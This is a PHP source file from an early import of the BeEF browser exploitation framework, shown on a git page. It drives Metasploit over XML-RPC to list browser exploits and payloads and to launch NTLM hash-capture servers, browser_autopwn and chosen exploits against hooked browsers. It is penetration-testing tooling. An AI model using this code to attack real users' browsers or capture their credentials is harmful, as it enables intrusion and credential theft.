Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3b8add44e15758776097c9d7e21f6e2c993aa964
beef/ui/msf.php
wade@bindshell.net 03ffb4703d Initial Import 
git-svn-id: https://beef.googlecode.com/svn/trunk@2 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
2010-01-11 00:54:08 +00:00

508 lines
12 KiB
PHP
Raw Blame History

<?php
// PHP Module for BeefSploit
// By Ryan Linn (sussurro@happypacket.net)
require_once('../include/xmlrpc.inc.php');
require_once("../include/common.inc.php");
require_once("../include/msf_filter.inc.php");
include("../include/msf.inc.php");
session_start();
// set load error message
$msf_load_error = '<select name="" id="loading" onChange="">';
$msf_load_error .= '<option value="">Load Failed! Check Logs</option>';
$msf_load_error .= '</select>';
$sock = FALSE;
// connect to msf
$sock = msf_connect(MSF_HOST,MSF_PORT);
if($sock === FALSE) { // check failure
print $msf_load_error;
exit;
}
// login to msf
$token = xmlrpc_msf_login($sock,MSF_USER,MSF_PASS);
if($token === FALSE) { // check failure
print $msf_load_error;
socket_close($sock);
exit;
}
function close_socket_and_exit($sock) {
if( !($sock === FALSE) ) {
socket_close($sock);
}
exit();
}
if($_GET["action"] == "getexploits") { // get exploits
get_exploits($sock, $token);
} elseif($_GET["action"] == "getpayloads" && $_GET["exploit"]) { // get payloads
$exploit = get_and_filter_exploit();
if(!$exploit) close_socket_and_exit($sock);
get_payloads($sock,$token,$exploit);
} elseif($_GET["action"] == "getoptions" && $_GET["exploit"] && $_GET["payload"]) { // get options
$exploit = get_and_filter_exploit();
if(!$exploit) close_socket_and_exit($sock);
$payload = get_and_filter_payload();
if(!$payload) close_socket_and_exit($sock);
get_options($sock, $token, $exploit, $payload);
} elseif($_GET["action"] == "smbchallengecapture") { // execute smb capture
$options = get_and_filter_smb_capture_options();
if(!$options) close_socket_and_exit($sock);
$options["LOGFILE"] = TMP_DIR . 'logfile';
$options["PWFILE"] = TMP_DIR . 'pwfile';
execute_smb_capture($sock, $token, $options);
} elseif($_GET["action"] == "browserautopwn") { // execute smb capture
$options = get_and_filter_module_options();
if(!$options) close_socket_and_exit($sock);
execute_browser_autopwn($sock, $token, $options);
} elseif($_GET["action"] == "exploit") {
$options = get_and_filter_module_options();
if(!$options) close_socket_and_exit($sock);
$exploit = get_and_filter_exploit();
if(!$exploit) close_socket_and_exit($sock);
execute_module($sock, $token, $exploit, $options);
}
socket_close($sock);
// --[ XMLRPC GET EXPLOITS
// get msf exploits via xmlrpc request
function xmlrpc_get_exploits($sock, $token) {
if(!$sock || !$token ) {
$error = "MSF get exploit error:\n";
$error .= "- Socket and/or Token failed";
beef_log($error, $error);
return FALSE;
}
// construct request
$msg = new xmlrpcmsg("module.exploits",
array( new xmlrpcval($token,"string")));
$string = $msg->serialize() . "\0";
// send request
socket_write($sock,$string);
// get response
$resp = "";
while(!preg_match("/\/methodResponse/",$resp)) {
$resp .= socket_read($sock,2048);
}
$resp = str_replace("\0","",$resp);
$t = php_xmlrpc_decode_xml($resp);
// check error
if($t->errno) {
$error = "MSF get exploit error:\n";
$error .= "- Response from MSF Failed";
beef_log($error, $error);
return FALSE;
}
$val = $t->val;
// extract exploits from response
$modules = $val->structMem("modules");
$exploits = array();
for($i = 0; $i < $modules->arraySize(); $i++) {
$value = $modules->arrayMem($i);
if(preg_match("/browser/",$value->scalarVal())) {
array_push($exploits,$value->scalarVal());
}
}
return $exploits;
}
function get_exploits($sock, $token) {
// get exploits
$exploits = xmlrpc_get_exploits($sock, $token);
if($exploits === FALSE) {
print "fail";
} else {
$html_select = construct_select('exploit', $exploits, 'msf_get_payload_list()');
print $html_select;
}
}
function get_payloads($sock, $token, $exploit) {
$payloads = xmlrpc_get_payloads($sock,$token,$exploit);
if($payloads === FALSE) {
print "fail";
} else {
$html_select = construct_select('payload', $payloads, 'msf_get_options()');
print $html_select;
}
}
function get_options($sock, $token, $exploit, $payload) {
// get all options
$exp_opt = xmlrpc_get_options($sock, $token, "exploit", $exploit);
$pay_opt = xmlrpc_get_options($sock, $token, "payload", $payload);
$full_options = array_merge($exp_opt, $pay_opt);
print construct_options_form($full_options);
}
function execute_smb_capture($sock, $token, $options) {
// set the module to use
$module = "server/capture/http_ntlm";
$result = xmlrpc_execute_module($sock, $token, $module, "auxiliary", $options);
if($result === FALSE) {
print "fail";
return;
}
$url = MSF_BASE_URL . ":" . $options["SRVPORT"] . "/" . $options["URIPATH"];
if( ! valid_url_without_query($url) ){
print "fail";
return;
}
beef_log("SMB Exploit Launched", "SMB Exploit Launched. Waiting for Metasploit to send URL");
print $url;
}
function execute_browser_autopwn($sock, $token, $options) {
// set the module to use
$module = "server/browser_autopwn";
$result = xmlrpc_execute_module($sock, $token, $module, "auxiliary", $options);
if($result === FALSE) {
print "fail";
return;
}
$url = MSF_BASE_URL . ":" . $options["SRVPORT"] . "/" . $options["URIPATH"];
if( ! valid_url_without_query($url) ){
print "fail";
return;
}
beef_log("Autopwn Exploit Launched", "Autopwn Exploit Launched. Waiting for Metasploit to send URL");
print $url;
}
function execute_module($sock, $token, $module, $options) {
$result = xmlrpc_execute_module($sock, $token, $module, "exploit", $options);
if($result === FALSE) {
print "fail";
return;
}
$url = MSF_BASE_URL . ":" . $options["SRVPORT"] . "/" . $options["URIPATH"];
if( ! valid_url_without_query($url) ){
print "fail";
return;
}
beef_log("Exploit ($module) Launched", "Exploit ($module) Launched. Waiting for Metasploit to send URL");
print $url;
}
// --[ XMLRPC GET PAYLOADS
// get msf payloads via xmlrpc request
function xmlrpc_get_payloads($sock, $token, $exploit) {
if(!$sock || !$token || !$exploit) {
$error = "MSF get payloads error:\n";
$error .= "- Socket, Token and/or Exploit failed";
beef_log($error, $error);
return FALSE;
}
// construct request
$msg = new xmlrpcmsg("module.compatible_payloads",
array( new xmlrpcval($token,"string"),
new xmlrpcval($exploit,"string")));
$string = $msg->serialize() . "\0";
// send request
socket_write($sock,$string);
// get response
$resp = "";
$resp .= socket_read($sock, 32768);
$resp = str_replace("\0","",$resp);
$t = php_xmlrpc_decode_xml($resp);
// check error
if($t->errno) {
return FALSE;
}
$val = $t->val;
// extract payloads from response
$modules = $val->structMem("payloads");
$payloads = array();
for($i = 0; $i < $modules->arraySize(); $i++) {
$value = $modules->arrayMem($i);
array_push($payloads,$value->scalarVal());
}
return $payloads;
}
// --[ XMLRPC GET OPTIONS
// get msf options via xmlrpc request
function xmlrpc_get_options($sock, $token, $type, $module) {
if(!$sock || !$token || !$type || !$module) {
$error = "MSF get options error:\n";
$error .= "- Socket, Token, Type and/or Module failed";
beef_log($error, $error);
return FALSE;
}
// construct request
$msg = new xmlrpcmsg("module.options",
array( new xmlrpcval($token,"string"),
new xmlrpcval($type,"string"),
new xmlrpcval($module,"string")
));
$string = $msg->serialize() . "\0";
// send request
socket_write($sock,$string);
// get response
$resp = "";
$resp .= socket_read($sock,32768);
$resp = str_replace("\0","",$resp);
$t = php_xmlrpc_decode_xml($resp);
// check error
if($t->errno) {
$error = "MSF get options error:\n";
$error .= "- Response from MSF Failed";
beef_log($error, $error);
return FALSE;
}
// extract options from response
$val = $t->val;
$val->structreset();
$options = array();
while(list($key,$v) = $val->structEach()) {
$v->structreset();
$options[$key] = array();
while(list($k,$v2) = $v->structEach()) {
$options[$key][$k] = $v2->scalarVal();
}
}
return $options;
}
// --[ XMLRPC EXECUTE MODULE
// launch metasploit module
function xmlrpc_execute_module($sock, $token, $module, $type, $options) {
if(!$sock || !$token || !$module || !$type || !$options || !is_array($options)) {
$error = "MSF execute module error:\n";
$error .= "- Socket, Token, Name, Type and/or Options failed";
beef_log($error, $error);
return FALSE;
}
// create request
$optval = new xmlrpcval;
$o = array();
foreach ($options as $k => $v) {
$o[$k] = new xmlrpcval($v,"string");
}
$optval->addStruct($o);
$msg = new xmlrpcmsg("module.execute", // method name
array( new xmlrpcval($token,"string"), // params
new xmlrpcval($type,"string"),
new xmlrpcval($module,"string"), // metasploit module
$optval));
$string = $msg->serialize() . "\0";
// send request
socket_write($sock,$string);
$resp = socket_read($sock,2048);
$resp = str_replace("\0","",$resp);
$t = php_xmlrpc_decode_xml($resp);
// check error
if($t->errno) {
$error = "MSF execute module error:\n";
$error .= "- Calling $module failed";
beef_log($error, $error);
return FALSE;
}
return TRUE;
}
// --[ MSF LOGIN
// login to metasploit via xml rpc and return token
function xmlrpc_msf_login($sock, $username, $password)
{
// create login request
$msg = new xmlrpcmsg("auth.login",
array(new xmlrpcval($username,"string"),
new xmlrpcval($password,"string")));
$string = $msg->serialize() . "\0";
// send login request
socket_write($sock,$string);
// get login response
$resp = socket_read($sock, 2048);
$resp = str_replace("\0","",$resp);
$t = php_xmlrpc_decode_xml($resp);
// check if login failed
if($t->errno) {
$login_error = "MSF login error:\n";
$login_error .= "- Check MSF_USER and MSF_PASS settings are correct";
beef_log($login_error, $login_error);
return FALSE;
}
// login successful so return session token
$token = $t->val->structmem("token");
return $token->scalarval();
}
// --[ MSF CONNECT
// create tcp connection to msf
function msf_connect($host, $port)
{
if(!$host) {
$connect_error = "MSF connect error:\n";
$connect_error .= "- Invalid MSF_HOST variable setting";
beef_log($connect_error, $connect_error);
return FALSE;
}
if(!$port) {
$connect_error = "MSF connect error:\n";
$connect_error .= "- Invalid MSF_PORT variable setting";
beef_log($connect_error, $connect_error);
return FALSE;
}
$sock = @socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
if($sock == FALSE) {
$connect_error = "MSF connect error:\n";
$connect_error .= "- Create socket failed";
beef_log($connect_error, $connect_error);
return FALSE;
}
$connected = @socket_connect($sock,$host,$port);
if(!$connected) {
$connect_error = "MSF connect error:\n";
$connect_error .= "- Cannot connect to MSF: " . $host . ":" . $port;
beef_log($connect_error, $connect_error);
return FALSE;
}
return $sock;
}
// --[ CONSTRUCT SELECT
// construct a html select from array
function construct_select($name, $values, $onchange) {
sort($values);
// start select
$return_select = '<select name="' . $name . '" id="' . $name . '" onChange="'. $onchange . ';">\n';
foreach ($values as $value) {
$return_select .= '<option value="' . $value . '">' . $value . '</option>\n';
}
// terminate select
$return_select .= "</select>\n";
return $return_select . "\n";
}
// --[ CONTRUCT OPTIONS FORM
// create a html exploit options form
function construct_options_form($options) {
$options_form = "";
// contruct options to be displayed to in browser
foreach($options as $key=>$value) {
// don't display advanced, evasion and boolean options
if($value["advanced"] == 1 || $value["evasion"] == 1 || $value["type"] == "bool") {
continue;
}
// create heading
$options_form .= "<div id=\"module_subsection_header\">";
$options_form .= "$key";
if($value["required"] == 1) {
$options_form .= " (required)";
}
$options_form .= ": </div>\n";
// create discription
$options_form .= $value["desc"] . "<br>";
// create input box
$options_form .= "<input type=\"text\" name=\"$key\" value=\"".$value["default"] ."\"/>\n";
}
return $options_form;
}
?>
Reference in New Issue View Git Blame Copy Permalink